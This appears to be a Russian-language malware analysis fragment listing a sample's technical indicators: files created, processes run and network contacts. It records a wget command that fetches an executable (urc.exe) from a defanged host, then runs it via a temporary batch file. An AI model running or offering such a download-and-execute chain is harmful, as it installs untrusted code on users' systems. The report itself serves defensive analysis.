Техническая информация
- C:\urc.exe (загружен из сети Интернет)
- <Текущая директория>\wget.exe http://ta#.#ghost.ru/download/35794416/8ea4e806d0165dacca2a5512cc8bdb3e7409c8e1/urc.exe -O C:\urc.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\test.bat" "
- C:\urc.exe
- <Текущая директория>\wget.exe
- %TEMP%\1.tmp\test.bat
- %TEMP%\1.tmp\test.bat
- <Текущая директория>\wget.exe
- 'ta#.#ghost.ru':80
- ta#.#ghost.ru/download/35794416/8ea4e806d0165dacca2a5512cc8bdb3e7409c8e1/urc.exe
- DNS ASK ta#.#ghost.ru
- '<IP-адрес в локальной сети>':1035